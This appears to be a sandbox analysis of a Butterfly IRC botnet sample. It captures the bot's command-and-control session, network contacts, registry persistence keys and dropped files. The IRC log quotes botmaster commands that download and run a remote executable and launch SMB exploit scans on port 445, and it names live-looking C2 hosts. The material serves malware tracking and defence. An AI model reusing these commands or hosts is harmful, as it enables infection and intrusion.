update2.helohmar.com (Butterfly bot hosted with United Kingdom Didjief Internation Kulinari Koncept Llc)

DNS Lookup
Host Name IP Address
ms.allnewdots.com 208.53.131.135 ircd here

PASS laorosr
NCIK [N00_USA_XP_2598789].ç@
USER SP3-191 * 0 :EXPERIEN-9DF758
:hub.us.com 001 [N00_USA_XP_2598789]___ :us, [N00_USA_XP_2598789]___!SP3-191@host81-141-83-239.wlms-broadband.com
:
:hub.us.com 005 [N00_USA_XP_2598789]___
:[N00_USA_XP_2598789]___!SP3-191@host81-141-83-239.wlms-broadband.com JOIN :#dpi
:hub.us.com 332 [N00_USA_XP_2598789]___ #dpi :finito
:hub.us.com 333 [N00_USA_XP_2598789]___ #dpi la 1291139776
:hub.us.com 353 [N00_USA_XP_2598789]___ @ #dpi :[N00_USA_XP_2598789]___
:hub.us.com 366 [N00_USA_XP_2598789]___ #dpi :End of /NAMES list.
MODE [N00_USA_XP_2598789].ç@ -ix

send #!,#Ma oooo
MODE #dpi -ix
:[N00_USA_XP_2598789]___!SP3-191@host81-141-83-239.wlms-broadband.com JOIN :#!
:hub.us.com 332 [N00_USA_XP_2598789]___ #! :.asc -S|.http http://208.53.183.249/wshh.exe|.asc exp_all 25 5 0 -a -r -e|.asc exp_all 25 5 0 -b -r -e|.asc exp_all 20 5 0 -b|.asc exp_all 20 5 0 -c|.asc exp_all 10 5 0 -a
:hub.us.com 333 [N00_USA_XP_2598789]___ #! Master51 1291111469
:hub.us.com 353 [N00_USA_XP_2598789]___ @ #! :[N00_USA_XP_2598789]___
:hub.us.com 366 [N00_USA_XP_2598789]___ #! :End of /NAMES list.
:[N00_USA_XP_2598789]___!SP3-191@host81-141-83-239.wlms-broadband.com JOIN :#Ma
:hub.us.com 353 [N00_USA_XP_2598789]___ @ #Ma :[N00_USA_XP_2598789]___
:hub.us.com 366 [N00_USA_XP_2598789]___ #Ma :End of /NAMES list.
:hub.us.com 482 [N00_USA_XP_2598789]___ #dpi :You’re not channel operator
PRRVMSG #i :HTTP SET http://208.53.183.249/wshh.exe

PRRVMSG [N00_USA_XP_2598¼¹@ : Trying to get external IP.

PRRVMSG [N00_USA_XP_2598¼¹@ : Random Port Scan started on 192.x.x.x:445 with a delay of 5 seconds for 0 minutes using 25 threads.

PRRVMSG [N00_USA_XP_2598¼¹@ : Trying to get external IP.

PRRVMSG [N00_USA_XP_2598¼¹@ : Random Port Scan started on 192.168.x.x:445 with a delay of 5 seconds for 0 minutes using 25 threads.

PRRVMSG [N00_USA_XP_2598¼¹@ : Sequential Port Scan started on 192.168.0.0:445 with a delay of 5 seconds for 0 minutes using 20 threads.

PRRVMSG #i :Host [192.168.0.11:445] Country [USA_SP2]

PRRVMSG #i :Host [192.168.0.11:445] Country [USA] // If its SP2 []
PRRVMSG [N00_USA_XP_2598¼¹@ : Sequential Port Scan started on 192.168.0.0:445 with a delay of 5 seconds for 0 minutes using 20 threads.

PRRVMSG [N00_USA_XP_2598¼¹@ : Sequential Port Scan started on 192.0.0.0:445 with a delay of 5 seconds for 0 minutes using 10 threads.

MODE #! -ix
MODE #Ma -ix
:hub.us.com 482 [N00_USA_XP_2598789]___ #! :You’re not channel operator
:hub.us.com 482 [N00_USA_XP_2598789]___ #Ma :You’re not channel operator
PING :hub.us.com
PONG hub.us.com
PING :hub.us.com
PONG hub.us.com
PRRVMSG #i :WIN2K Host [192.168.0.3:445]

PRRVMSG #i :Host [192.168.0.3:445] Country [USA] // If its SP2 []

PRRVMSG #i :WIN2K3 Host [192.242.14.227:445]

dell-d3e62f7e26 10.1.6.2
208.53.183.113 208.53.183.113
ff.fjpark.com 98.126.180.250
208.53.183.124 208.53.183.124
208.53.183.92 208.53.183.92
UDP Connections
Remote IP Address: 208.53.131.135 Port: 1863
Send Datagram: packet(s) of size 7
Send Datagram: 3 packet(s) of size 3
Send Datagram: packet(s) of size 61
Recv Datagram: 5156 packet(s) of size 0
Recv Datagram: 2 packet(s) of size 8
Recv Datagram: packet(s) of size 3
Recv Datagram: packet(s) of size 42
Remote IP Address: 98.126.180.250 Port: 9955
Send Datagram: packet(s) of size 21
Send Datagram: 4 packet(s) of size 10
Send Datagram: packet(s) of size 20
Send Datagram: 3 packet(s) of size 1
Send Datagram: 2 packet(s) of size 2
Recv Datagram: 7940 packet(s) of size 0
Recv Datagram: packet(s) of size 21
Recv Datagram: packet(s) of size 10
Recv Datagram: packet(s) of size 539
Recv Datagram: packet(s) of size 88
Recv Datagram: packet(s) of size 84
Download URLs
http://208.53.183.113/customer.file (208.53.183.113)
http://208.53.183.92/workers.data (208.53.183.92)
http://208.53.183.124/privetdata.data (208.53.183.124)

Outgoing connection to remote server: 208.53.183.113 TCP port 80
Outgoing connection to remote server: 208.53.183.92 TCP port 80
Outgoing connection to remote server: 208.53.183.124 TCP port 80

DNS Lookup
Host Name IP Address
dell-d3e62f7e26 10.1.6.2
mydrivers.babypin.net 109.196.130.66
www.nippon.to
www.nippon.to 112.78.112.208
www.cooleasy.com
www.cooleasy.com 218.85.133.201
obsoletegod.com
Download URLs
http://112.78.112.208/cgi-bin/prxjdg.cgi (www.nippon.to)
http://218.85.133.201/cgi-bin/prxjdg.cgi (www.cooleasy.com)
http://218.85.133.201/cgi-bin/prxjdg.cgi (www.cooleasy.com)
http://218.85.133.201/cgi-bin/prxjdg.cgi (www.cooleasy.com)
http://112.78.112.208/cgi-bin/prxjdg.cgi (www.nippon.to)
http://112.78.112.208/cgi-bin/prxjdg.cgi (www.nippon.to)

Outgoing connection to remote server: mydrivers.babypin.net port 34074
Outgoing connection to remote server: www.nippon.to TCP port 80
Outgoing connection to remote server: www.cooleasy.com TCP port 80
Outgoing connection to remote server: www.nippon.to TCP port 80
Outgoing connection to remote server: www.nippon.to TCP port 80

DNS Lookup
Host Name IP Address
update2.helohmar.com 91.200.242.230
mx1.hotmail.com 65.55.92.152
Download URLs
http://91.200.242.230/spm/s_get_host.php?ver=522 (update2.helohmar.com)

SMTP: 65.55.92.152:25
Outgoing connection to remote server: update2.helohmar.com TCP port 8

Registry Changes by all processes
Create or Open
Changes HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon “Taskman” = C:\RECYCLER\S-1-5-21-4657300404-8583041059-826601200-3402\syscr.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon “Taskman” = C:\Dokumente und Einstellungen\Administrator\Anwendungsdaten\ltzqai.exe
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Winlogon “Shell” = explorer.exe,C:\Dokumente und Einstellungen\Administrator\Anwendungsdaten\ltzqai.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run “Microsoft Driver Setup” = C:\WINDOWS\cwdrive32.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\Run “Microsoft Driver Setup” = C:\WINDOWS\cwdrive32.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run “MSODESNV7” = C:\WINDOWS\system32\msvmiode.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Setup “ridt100413” = 1
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Setup “id” = 52283781519523715381965830893962
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Setup “host” = 91.200.242.230
Reads HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon “Taskman”

File Changes by all processes
New Files C:\RECYCLER\S-1-5-21-4657300404-8583041059-826601200-3402\Desktop.ini
C:\RECYCLER\S-1-5-21-4657300404-8583041059-826601200-3402\syscr.exe
C:\RECYCLER\S-1-5-21-4657300404-8583041059-826601200-3402\syscr.exe
C:\RECYCLER\S-1-5-21-4657300404-8583041059-826601200-3402\Desktop.ini
\\.\pipe\jfheffdsd
\Device\RasAcd
C:\DOKUME~1\ADMINI~1\LOKALE~1\Temp\853.exe
C:\Dokumente und Einstellungen\Administrator\Anwendungsdaten\ltzqai.exe
\\.\pipe\ezkrbvjzbmxwfh
C:\DOKUME~1\ADMINI~1\LOKALE~1\Temp\4819849.exe
C:\DOKUME~1\ADMINI~1\LOKALE~1\Temp\356.exe
Dfs
\Device\Tcp
\Device\Ip
\Device\Ip
C:\WINDOWS\cwdrive32.exe
C:\WINDOWS\system32\msvmiode.exe
\Device\Tcp
\Device\Ip
\Device\Ip
\Device\RasAcd
%windir%/lfffile32.log
\Device\RasAcd
\Device\Tcp
\Device\Ip
\Device\Ip
\Device\Tcp6
\Device\NetBT_Tcpip_{5D19E473-BE30-416B-B5C7-D8A091C41D2F}
Deleted Files C:\Dokumente und Einstellungen\Administrator\Anwendungsdaten\ltzqai.exe
Chronological Order Set File Attributes: C:\RECYCLER Flags: (FILE_ATTRIBUTE_HIDDEN FILE_ATTRIBUTE_READONLY FILE_ATTRIBUTE_SYSTEM SECURITY_ANONYMOUS)
Set File Attributes: C:\RECYCLER\S-1-5-21-4657300404-8583041059-826601200-3402 Flags: (FILE_ATTRIBUTE_HIDDEN FILE_ATTRIBUTE_READONLY FILE_ATTRIBUTE_SYSTEM SECURITY_ANONYMOUS)
Create File: C:\RECYCLER\S-1-5-21-4657300404-8583041059-826601200-3402\Desktop.ini
Copy File: c:\50b7d2be17284330ae1463a4578b9ca1 to C:\RECYCLER\S-1-5-21-4657300404-8583041059-826601200-3402\syscr.exe
Set File Attributes: C:\RECYCLER\S-1-5-21-4657300404-8583041059-826601200-3402\syscr.exe Flags: (FILE_ATTRIBUTE_HIDDEN FILE_ATTRIBUTE_READONLY FILE_ATTRIBUTE_SYSTEM SECURITY_ANONYMOUS)
Create/Open File: C:\RECYCLER\S-1-5-21-4657300404-8583041059-826601200-3402\syscr.exe (OPEN_ALWAYS)
Create/Open File: C:\RECYCLER\S-1-5-21-4657300404-8583041059-826601200-3402\Desktop.ini (OPEN_ALWAYS)
Create NamedPipe: \\.\pipe\jfheffdsd
Create/Open File: \Device\RasAcd (OPEN_ALWAYS)
Open File: \\.\PIPE\lsarpc (OPEN_EXISTING)
Create File: C:\DOKUME~1\ADMINI~1\LOKALE~1\Temp\853.exe
Get File Attributes: c:\cwsandbox\cwsandbox.exe Flags: (SECURITY_ANONYMOUS)
Open File: C:\DOKUME~1\ADMINI~1\LOKALE~1\Temp\853.exe (OPEN_EXISTING)
Open File: C:\WINDOWS\AppPatch\sysmain.sdb (OPEN_EXISTING)
Open File: C:\WINDOWS\AppPatch\systest.sdb (OPEN_EXISTING)
Open File: \Device\NamedPipe\ShimViewer (OPEN_EXISTING)
Open File: C:\DOKUME~1\ADMINI~1\LOKALE~1\Temp ()
Find File: C:\DOKUME~1\ADMINI~1\LOKALE~1\Temp\853.exe
Set File Attributes: C:\Dokumente und Einstellungen\Administrator\Anwendungsdaten\ltzqai.exe Flags: (FILE_ATTRIBUTE_NORMAL SECURITY_ANONYMOUS)
Delete File: C:\Dokumente und Einstellungen\Administrator\Anwendungsdaten\ltzqai.exe
Copy File: C:\DOKUME~1\ADMINI~1\LOKALE~1\Temp\853.exe to C:\Dokumente und Einstellungen\Administrator\Anwendungsdaten\ltzqai.exe
Set File Attributes: C:\Dokumente und Einstellungen\Administrator\Anwendungsdaten\ltzqai.exe Flags: (FILE_ATTRIBUTE_HIDDEN FILE_ATTRIBUTE_READONLY FILE_ATTRIBUTE_SYSTEM SECURITY_ANONYMOUS)
Open File: C:\Dokumente und Einstellungen\Administrator\Anwendungsdaten\ltzqai.exe (OPEN_EXISTING)
Create NamedPipe: \\.\pipe\ezkrbvjzbmxwfh
Create File: C:\DOKUME~1\ADMINI~1\LOKALE~1\Temp\4819849.exe
Create File: C:\DOKUME~1\ADMINI~1\LOKALE~1\Temp\356.exe
Open File: \\.\PIPE\wkssvc (OPEN_EXISTING)
Create/Open File: Dfs (OPEN_ALWAYS)
Open File: \\.\PIPE\DAV RPC SERVICE (OPEN_EXISTING)
Find File: C:\DOKUME~1\ADMINI~1\LOKALE~1\Temp\356.exe
Find File: C:\DOKUME~1\ADMINI~1\LOKALE~1\Temp\4819849.exe
Open File: C:\WINDOWS\AppPatch\sysmain.sdb (OPEN_EXISTING)
Open File: C:\WINDOWS\AppPatch\systest.sdb (OPEN_EXISTING)
Open File: \Device\NamedPipe\ShimViewer (OPEN_EXISTING)
Open File: C:\DOKUME~1\ADMINI~1\LOKALE~1\Temp ()
Find File: C:\DOKUME~1\ADMINI~1\LOKALE~1\Temp\853.exe
Open File: C:\WINDOWS\AppPatch\sysmain.sdb (OPEN_EXISTING)
Open File: C:\WINDOWS\AppPatch\systest.sdb (OPEN_EXISTING)
Open File: \Device\NamedPipe\ShimViewer (OPEN_EXISTING)
Open File: C:\DOKUME~1\ADMINI~1\LOKALE~1\Temp ()
Find File: C:\DOKUME~1\ADMINI~1\LOKALE~1\Temp\356.exe
Get File Attributes: C:\WINDOWS\system32\.HLP Flags: (SECURITY_ANONYMOUS)
Get File Attributes: C:\WINDOWS\Help\.HLP Flags: (SECURITY_ANONYMOUS)
Create/Open File: \Device\Tcp (OPEN_ALWAYS)
Create/Open File: \Device\Ip (OPEN_ALWAYS)
Create/Open File: \Device\Ip (OPEN_ALWAYS)
Open File: \\.\Ip (OPEN_EXISTING)
Get File Attributes: C:\WINDOWS\cwdrive32.exe Flags: (SECURITY_ANONYMOUS)
Copy File: C:\DOKUME~1\ADMINI~1\LOKALE~1\Temp\356.exe to C:\WINDOWS\cwdrive32.exe
Set File Attributes: C:\WINDOWS\cwdrive32.exe Flags: (FILE_ATTRIBUTE_HIDDEN FILE_ATTRIBUTE_READONLY FILE_ATTRIBUTE_SYSTEM SECURITY_ANONYMOUS)
Get File Attributes: C:\WINDOWS\Registration Flags: (SECURITY_ANONYMOUS)
Open File: C:\WINDOWS\Registration\R000000000007.clb (OPEN_EXISTING)
Open File: \\.\PIPE\lsarpc (OPEN_EXISTING)
Open File: C:\WINDOWS\AppPatch\sysmain.sdb (OPEN_EXISTING)
Open File: C:\WINDOWS\AppPatch\systest.sdb (OPEN_EXISTING)
Open File: \Device\NamedPipe\ShimViewer (OPEN_EXISTING)
Open File: C:\WINDOWS ()
Find File: C:\WINDOWS\cwdrive32.exe
Open File: C:\DOKUME~1\ADMINI~1\LOKALE~1\Temp\4819849.exe (OPEN_EXISTING)
Copy File: C:\DOKUME~1\ADMINI~1\LOKALE~1\Temp\4819849.exe to C:\WINDOWS\system32\msvmiode.exe
Open File: C:\WINDOWS\AppPatch\sysmain.sdb (OPEN_EXISTING)
Open File: C:\WINDOWS\AppPatch\systest.sdb (OPEN_EXISTING)
Open File: \Device\NamedPipe\ShimViewer (OPEN_EXISTING)
Open File: C:\WINDOWS\system32 ()
Find File: C:\WINDOWS\system32\msvmiode.exe
Get File Attributes: C:\WINDOWS\system32\.HLP Flags: (SECURITY_ANONYMOUS)
Get File Attributes: C:\WINDOWS\Help\.HLP Flags: (SECURITY_ANONYMOUS)
Create/Open File: \Device\Tcp (OPEN_ALWAYS)
Create/Open File: \Device\Ip (OPEN_ALWAYS)
Create/Open File: \Device\Ip (OPEN_ALWAYS)
Open File: \\.\Ip (OPEN_EXISTING)
Create/Open File: \Device\RasAcd (OPEN_ALWAYS)
Open File: %windir%/lfffile32.log (OPEN_EXISTING)
Create File: %windir%/lfffile32.log
Open File: \\.\PIPE\ROUTER (OPEN_EXISTING)
Open File: \\.\PIPE\lsarpc (OPEN_EXISTING)
Get File Attributes: c:\autoexec.bat Flags: (SECURITY_ANONYMOUS)
Open File: c:\autoexec.bat (OPEN_EXISTING)
Find File: C:\Dokumente und Einstellungen\All Users\Anwendungsdaten\Microsoft\Network\Connections\Pbk\*.pbk
Find File: C:\WINDOWS\system32\Ras\*.pbk
Find File: C:\Dokumente und Einstellungen\Administrator\Anwendungsdaten\Microsoft\Network\Connections\Pbk\*.pbk
Open File: C:\WINDOWS\system32\msvmiode.exe (OPEN_EXISTING)
Create/Open File: \Device\RasAcd (OPEN_ALWAYS)
Create/Open File: \Device\Tcp (OPEN_ALWAYS)
Create/Open File: \Device\Ip (OPEN_ALWAYS)
Create/Open File: \Device\Ip (OPEN_ALWAYS)
Open File: \\.\Ip (OPEN_EXISTING)
Create/Open File: \Device\Tcp6 (OPEN_ALWAYS)
Create/Open File: \Device\NetBT_Tcpip_{5D19E473-BE30-416B-B5C7-D8A091C41D2F} (OPEN_ALWAYS)
Open File: \\.\PIPE\lsarpc (OPEN_EXISTING)

More info about the hosting here:
http://whois.domaintools.com/91.200.242.230 (United Kingdom Didjief Internation Kulinari Koncept Llc)